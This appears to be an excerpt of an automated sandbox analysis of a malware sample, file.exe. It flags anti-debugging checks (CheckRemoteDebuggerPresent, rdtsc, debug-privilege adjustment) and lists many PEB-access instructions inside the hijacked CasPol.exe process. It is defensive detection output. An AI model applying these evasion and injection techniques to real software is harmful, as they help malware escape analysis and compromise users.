Source: file.exe, 00000000.00000002.259559774.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.259736068.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.259736068.00000000044A4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.259736068.000000000419B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `8fXjyyNqUj+ePCqeMUF

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02DF4910 CheckRemoteDebuggerPresent,

0_2_02DF4910

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 1_2_016A5BA5 rdtsc

1_2_016A5BA5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FB944 mov eax, dword ptr fs:[00000030h]	1_2_015FB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FB944 mov eax, dword ptr fs:[00000030h]	1_2_015FB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DB171 mov eax, dword ptr fs:[00000030h]	1_2_015DB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DB171 mov eax, dword ptr fs:[00000030h]	1_2_015DB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DC962 mov eax, dword ptr fs:[00000030h]	1_2_015DC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160513A mov eax, dword ptr fs:[00000030h]	1_2_0160513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160513A mov eax, dword ptr fs:[00000030h]	1_2_0160513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9100 mov eax, dword ptr fs:[00000030h]	1_2_015D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9100 mov eax, dword ptr fs:[00000030h]	1_2_015D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9100 mov eax, dword ptr fs:[00000030h]	1_2_015D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F4120 mov eax, dword ptr fs:[00000030h]	1_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F4120 mov eax, dword ptr fs:[00000030h]	1_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F4120 mov eax, dword ptr fs:[00000030h]	1_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F4120 mov eax, dword ptr fs:[00000030h]	1_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F4120 mov ecx, dword ptr fs:[00000030h]	1_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016641E8 mov eax, dword ptr fs:[00000030h]	1_2_016641E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DB1E1 mov eax, dword ptr fs:[00000030h]	1_2_015DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DB1E1 mov eax, dword ptr fs:[00000030h]	1_2_015DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DB1E1 mov eax, dword ptr fs:[00000030h]	1_2_015DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016061A0 mov eax, dword ptr fs:[00000030h]	1_2_016061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016061A0 mov eax, dword ptr fs:[00000030h]	1_2_016061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016569A6 mov eax, dword ptr fs:[00000030h]	1_2_016569A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016551BE mov eax, dword ptr fs:[00000030h]	1_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016551BE mov eax, dword ptr fs:[00000030h]	1_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016551BE mov eax, dword ptr fs:[00000030h]	1_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016551BE mov eax, dword ptr fs:[00000030h]	1_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FC182 mov eax, dword ptr fs:[00000030h]	1_2_015FC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160A185 mov eax, dword ptr fs:[00000030h]	1_2_0160A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602990 mov eax, dword ptr fs:[00000030h]	1_2_01602990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F0050 mov eax, dword ptr fs:[00000030h]	1_2_015F0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F0050 mov eax, dword ptr fs:[00000030h]	1_2_015F0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01692073 mov eax, dword ptr fs:[00000030h]	1_2_01692073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A1074 mov eax, dword ptr fs:[00000030h]	1_2_016A1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160002D mov eax, dword ptr fs:[00000030h]	1_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160002D mov eax, dword ptr fs:[00000030h]	1_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160002D mov eax, dword ptr fs:[00000030h]	1_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160002D mov eax, dword ptr fs:[00000030h]	1_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160002D mov eax, dword ptr fs:[00000030h]	1_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01657016 mov eax, dword ptr fs:[00000030h]	1_2_01657016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01657016 mov eax, dword ptr fs:[00000030h]	1_2_01657016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01657016 mov eax, dword ptr fs:[00000030h]	1_2_01657016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EB02A mov eax, dword ptr fs:[00000030h]	1_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EB02A mov eax, dword ptr fs:[00000030h]	1_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EB02A mov eax, dword ptr fs:[00000030h]	1_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EB02A mov eax, dword ptr fs:[00000030h]	1_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A4015 mov eax, dword ptr fs:[00000030h]	1_2_016A4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A4015 mov eax, dword ptr fs:[00000030h]	1_2_016A4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D58EC mov eax, dword ptr fs:[00000030h]	1_2_015D58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0 mov eax, dword ptr fs:[00000030h]	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0 mov eax, dword ptr fs:[00000030h]	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0 mov eax, dword ptr fs:[00000030h]	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0 mov eax, dword ptr fs:[00000030h]	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0 mov eax, dword ptr fs:[00000030h]	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016020A0 mov eax, dword ptr fs:[00000030h]	1_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016190AF mov eax, dword ptr fs:[00000030h]	1_2_016190AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9080 mov eax, dword ptr fs:[00000030h]	1_2_015D9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0160F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160F0BF mov eax, dword ptr fs:[00000030h]	1_2_0160F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160F0BF mov eax, dword ptr fs:[00000030h]	1_2_0160F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01653884 mov eax, dword ptr fs:[00000030h]	1_2_01653884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01653884 mov eax, dword ptr fs:[00000030h]	1_2_01653884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DF358 mov eax, dword ptr fs:[00000030h]	1_2_015DF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01603B7A mov eax, dword ptr fs:[00000030h]	1_2_01603B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01603B7A mov eax, dword ptr fs:[00000030h]	1_2_01603B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DDB40 mov eax, dword ptr fs:[00000030h]	1_2_015DDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A8B58 mov eax, dword ptr fs:[00000030h]	1_2_016A8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DDB60 mov ecx, dword ptr fs:[00000030h]	1_2_015DDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169131B mov eax, dword ptr fs:[00000030h]	1_2_0169131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016003E2 mov eax, dword ptr fs:[00000030h]	1_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016003E2 mov eax, dword ptr fs:[00000030h]	1_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016003E2 mov eax, dword ptr fs:[00000030h]	1_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016003E2 mov eax, dword ptr fs:[00000030h]	1_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016003E2 mov eax, dword ptr fs:[00000030h]	1_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016003E2 mov eax, dword ptr fs:[00000030h]	1_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016553CA mov eax, dword ptr fs:[00000030h]	1_2_016553CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016553CA mov eax, dword ptr fs:[00000030h]	1_2_016553CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FDBE9 mov eax, dword ptr fs:[00000030h]	1_2_015FDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01604BAD mov eax, dword ptr fs:[00000030h]	1_2_01604BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01604BAD mov eax, dword ptr fs:[00000030h]	1_2_01604BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01604BAD mov eax, dword ptr fs:[00000030h]	1_2_01604BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A5BA5 mov eax, dword ptr fs:[00000030h]	1_2_016A5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E1B8F mov eax, dword ptr fs:[00000030h]	1_2_015E1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E1B8F mov eax, dword ptr fs:[00000030h]	1_2_015E1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169138A mov eax, dword ptr fs:[00000030h]	1_2_0169138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0168D380 mov ecx, dword ptr fs:[00000030h]	1_2_0168D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160B390 mov eax, dword ptr fs:[00000030h]	1_2_0160B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602397 mov eax, dword ptr fs:[00000030h]	1_2_01602397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0168B260 mov eax, dword ptr fs:[00000030h]	1_2_0168B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0168B260 mov eax, dword ptr fs:[00000030h]	1_2_0168B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A8A62 mov eax, dword ptr fs:[00000030h]	1_2_016A8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0161927A mov eax, dword ptr fs:[00000030h]	1_2_0161927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9240 mov eax, dword ptr fs:[00000030h]	1_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9240 mov eax, dword ptr fs:[00000030h]	1_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9240 mov eax, dword ptr fs:[00000030h]	1_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D9240 mov eax, dword ptr fs:[00000030h]	1_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01664257 mov eax, dword ptr fs:[00000030h]	1_2_01664257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169EA55 mov eax, dword ptr fs:[00000030h]	1_2_0169EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F3A1C mov eax, dword ptr fs:[00000030h]	1_2_015F3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DAA16 mov eax, dword ptr fs:[00000030h]	1_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DAA16 mov eax, dword ptr fs:[00000030h]	1_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01614A2C mov eax, dword ptr fs:[00000030h]	1_2_01614A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01614A2C mov eax, dword ptr fs:[00000030h]	1_2_01614A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D5210 mov eax, dword ptr fs:[00000030h]	1_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D5210 mov ecx, dword ptr fs:[00000030h]	1_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D5210 mov eax, dword ptr fs:[00000030h]	1_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D5210 mov eax, dword ptr fs:[00000030h]	1_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E8A0A mov eax, dword ptr fs:[00000030h]	1_2_015E8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602AE4 mov eax, dword ptr fs:[00000030h]	1_2_01602AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602ACB mov eax, dword ptr fs:[00000030h]	1_2_01602ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0160FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EAAB0 mov eax, dword ptr fs:[00000030h]	1_2_015EAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EAAB0 mov eax, dword ptr fs:[00000030h]	1_2_015EAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160D294 mov eax, dword ptr fs:[00000030h]	1_2_0160D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160D294 mov eax, dword ptr fs:[00000030h]	1_2_0160D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D52A5 mov eax, dword ptr fs:[00000030h]	1_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D52A5 mov eax, dword ptr fs:[00000030h]	1_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D52A5 mov eax, dword ptr fs:[00000030h]	1_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D52A5 mov eax, dword ptr fs:[00000030h]	1_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D52A5 mov eax, dword ptr fs:[00000030h]	1_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F7D50 mov eax, dword ptr fs:[00000030h]	1_2_015F7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01613D43 mov eax, dword ptr fs:[00000030h]	1_2_01613D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01653540 mov eax, dword ptr fs:[00000030h]	1_2_01653540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FC577 mov eax, dword ptr fs:[00000030h]	1_2_015FC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FC577 mov eax, dword ptr fs:[00000030h]	1_2_015FC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169E539 mov eax, dword ptr fs:[00000030h]	1_2_0169E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0165A537 mov eax, dword ptr fs:[00000030h]	1_2_0165A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01604D3B mov eax, dword ptr fs:[00000030h]	1_2_01604D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01604D3B mov eax, dword ptr fs:[00000030h]	1_2_01604D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01604D3B mov eax, dword ptr fs:[00000030h]	1_2_01604D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A8D34 mov eax, dword ptr fs:[00000030h]	1_2_016A8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E3D34 mov eax, dword ptr fs:[00000030h]	1_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DAD30 mov eax, dword ptr fs:[00000030h]	1_2_015DAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01688DF1 mov eax, dword ptr fs:[00000030h]	1_2_01688DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656DC9 mov eax, dword ptr fs:[00000030h]	1_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656DC9 mov eax, dword ptr fs:[00000030h]	1_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656DC9 mov eax, dword ptr fs:[00000030h]	1_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656DC9 mov eax, dword ptr fs:[00000030h]	1_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656DC9 mov eax, dword ptr fs:[00000030h]	1_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015ED5E0 mov eax, dword ptr fs:[00000030h]	1_2_015ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015ED5E0 mov eax, dword ptr fs:[00000030h]	1_2_015ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016035A1 mov eax, dword ptr fs:[00000030h]	1_2_016035A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A05AC mov eax, dword ptr fs:[00000030h]	1_2_016A05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A05AC mov eax, dword ptr fs:[00000030h]	1_2_016A05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01601DB5 mov eax, dword ptr fs:[00000030h]	1_2_01601DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01601DB5 mov eax, dword ptr fs:[00000030h]	1_2_01601DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01601DB5 mov eax, dword ptr fs:[00000030h]	1_2_01601DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D2D8A mov eax, dword ptr fs:[00000030h]	1_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D2D8A mov eax, dword ptr fs:[00000030h]	1_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D2D8A mov eax, dword ptr fs:[00000030h]	1_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D2D8A mov eax, dword ptr fs:[00000030h]	1_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D2D8A mov eax, dword ptr fs:[00000030h]	1_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602581 mov eax, dword ptr fs:[00000030h]	1_2_01602581
